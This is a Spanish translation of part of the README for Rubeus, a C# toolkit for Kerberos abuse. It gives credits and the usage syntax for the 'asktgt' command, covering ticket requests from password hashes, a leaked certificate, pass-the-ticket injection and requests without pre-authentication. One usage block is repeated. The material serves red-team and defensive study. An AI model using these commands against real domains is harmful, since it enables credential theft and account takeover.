
Intentando domar al perro de tres cabezas.
Rubeus es un conjunto de herramientas en C# para la interacción directa con Kerberos y sus abusos. Está fuertemente adaptado del proyecto Kekeo de Benjamin Delpy (licencia CC BY-NC-SA 4.0) y del proyecto MakeMeEnterpriseAdmin de Vincent LE TOUX (licencia GPL v3.0). Todo el crédito es para Benjamin y Vincent por resolver los componentes difíciles de la weaponización; sin su trabajo previo este proyecto no existiría.
Charlie Clark y Ceri Coburn han realizado contribuciones significativas como co-desarrolladores del código base de Rubeus. Elad Shamir contribuyó con trabajo esencial para la delegación restringida basada en recursos. ¡Su trabajo es muy apreciado!
Rubeus también utiliza una biblioteca de análisis/codificación ASN.1 en C# de Thomas Pornin llamada DDer que fue publicada con una licencia "tipo MIT". ¡Muchas gracias a Thomas por su código limpio y estable!
El código PKINIT está fuertemente adaptado de la herramienta Bruce de @SteveSyfuhs. Bruce hizo que RFC4556 (PKINIT) fuera mucho más fácil de entender. ¡Muchas gracias a Steve!
La codificación y decodificación NDR para el PAC de Kerberos se basa en la biblioteca NtApiDotNet de @tiraniddo, gracias James.
El método KerberosRequestorSecurityToken.GetRequest para Kerberoasting fue contribuido a PowerView (y luego incorporado a Rubeus) por @machosec.
@harmj0y es el autor principal de esta base de código.
Rubeus está licenciado bajo la licencia BSD 3-Clause.
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
Solicitudes y renovaciones de tickets:
Obtener un TGT basado en una contraseña/hash de usuario, opcionalmente guardándolo en un archivo o aplicándolo a la sesión de inicio de sesión actual o a un LUID específico:
Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Obtener un TGT basado en una contraseña/hash de usuario, opcionalmente guardándolo en un archivo o aplicándolo a la sesión de inicio de sesión actual o a un LUID específico:
Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Obtener un TGT basado en una contraseña/hash de usuario, iniciar un proceso /netonly y aplicar el ticket al nuevo proceso/sesión de inicio de sesión:
Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Obtener un TGT usando un certificado PCKS12, iniciar un proceso /netonly y aplicar el ticket al nuevo proceso/sesión de inicio de sesión:
Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Obtener un TGT usando un certificado del almacén del usuario (Smartcard) especificando la huella digital o el asunto del certificado, iniciar un proceso /netonly y aplicar el ticket al nuevo proceso/sesión de inicio de sesión:
Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/suppenctype:DES|RC4|AES128|AES256] [/nowrap]
Obtener un TGT adecuado para cambiar una cuenta con contraseña caducada usando el comando changepw
Rubeus.exe asktgt /user:USER </password:PASSWORD /changepw [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/proxyurl:https://KDC_PROXY/kdcproxy]
Solicitar un TGT sin enviar datos de pre-autenticación:
Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]